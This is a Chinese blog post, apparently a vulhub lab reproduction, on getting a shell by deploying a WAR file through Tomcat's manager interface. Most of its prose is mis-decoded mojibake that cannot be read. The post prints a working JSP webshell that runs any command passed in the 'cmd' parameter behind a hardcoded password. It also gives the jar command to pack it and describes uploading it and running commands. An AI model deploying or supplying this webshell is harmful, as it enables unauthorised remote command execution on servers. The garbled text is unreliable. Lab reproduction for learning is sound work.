天天看點

Tomcat背景部署war木馬getshell

鏄ㄥ効涓潰璇曡闂埌濡備綍閫氳繃tomcat鎷縮hell锛屼箣鍓嶅彧鏄湅鍒幫紝娌″仛杩囧鐜幫紝瀵艱嚧鑷繁鍚冧簡浜忥紝鍒氬叆娓楅€忎笉涔呫€傚鐜扮殑婕忔礊澶皯锛岀粡楠屾柟闈㈣繕鏄繙杩滀笉澶熺殑锛屼竴鐐逛竴鐐規潵銆傚鐜拌繃绋嬪彲鑳芥瘮杈冪矖绯欙紝鏈変粈涔堥敊璇繕甯屾湜鍚勪綅澶у摜缁欏皬寮熸寚鐐逛竴鐣€?

闈跺満鎼緩锛? 鐧懼害涓€涓嬶紝vulhub閲岃竟灏辨湁

婕忔礊澶嶇幇锛? 杩涘叆闈跺満锛屾壘鍒闆悗鍙般€傞粯璁ょ殑璇濇槸鍦╩anager

Tomcat背景部署war木馬getshell
Tomcat背景部署war木馬getshell

鍑嗗濂介┈锛屾墦鍖呮垚war鍖?

<%@ page language="java" contentType="text/html; charset=GBK"
    pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>


    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <title>涓€鍙ヨ瘽鏈ㄩ┈</title>
    </head>

    <body>
        <%
        if ("admin".equals(request.getParameter("pwd"))) {
            java.io.InputStream input = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
            int len = -1;
            byte[] bytes = new byte[4092];
            out.print("<pre>");
            while ((len = input.read(bytes)) != -1) {
                out.println(new String(bytes, "GBK"));
            }
            out.print("</pre>");
        }
    %>
    </body>

</html>
//ps锛氶┈鐨勫嚭澶勶細https://blog.csdn.net/Jerry____/article/details/103387763
           

鎵ц:jar -cvf [war鍖呭悕绉癩.war 鎵撳寘鐩綍

Tomcat背景部署war木馬getshell

a.jsp 鐨勮瘽鏄竴鍙ヨ瘽鏈ㄩ┈锛屽ぇ瀹堕渶瑕佺殑璇濓紝鍙互鑷繁鎵句竴涓嬩竴浜涙湁鐢ㄧ殑椹紙鎴戞壘鐨勮繖涓┈涓嶅ソ鐢紝灏變笉鍋氳褰曚簡锛?

Tomcat背景部署war木馬getshell

涓婁紶锛岄儴缃瞱ar鍖?

Tomcat背景部署war木馬getshell

鍙互鐪嬪埌搴旂敤鍒楄〃宸茬粡鍑虹幇浜嗘垜浠殑鐩綍锛?

Tomcat背景部署war木馬getshell

璁塊棶涓€涓嬶細whoami 鎴愬姛鍥炴樉锛屾紡娲炲鐜扮畻鏄垚鍔熶簡銆?

Tomcat背景部署war木馬getshell
Tomcat背景部署war木馬getshell

鏈変簺鍛戒護鏄洖鏄句笉浜嗙殑锛屽ぇ姒傛槸椹笉澶銆?

鐢ㄥ摜鏂媺鐢熸垚浜嗕竴涓猨sp涓€鍙ヨ瘽锛岄噸鏂伴儴缃詫紝鎴愬姛杩炴帴锛屾嬁鍒皊hell

Tomcat背景部署war木馬getshell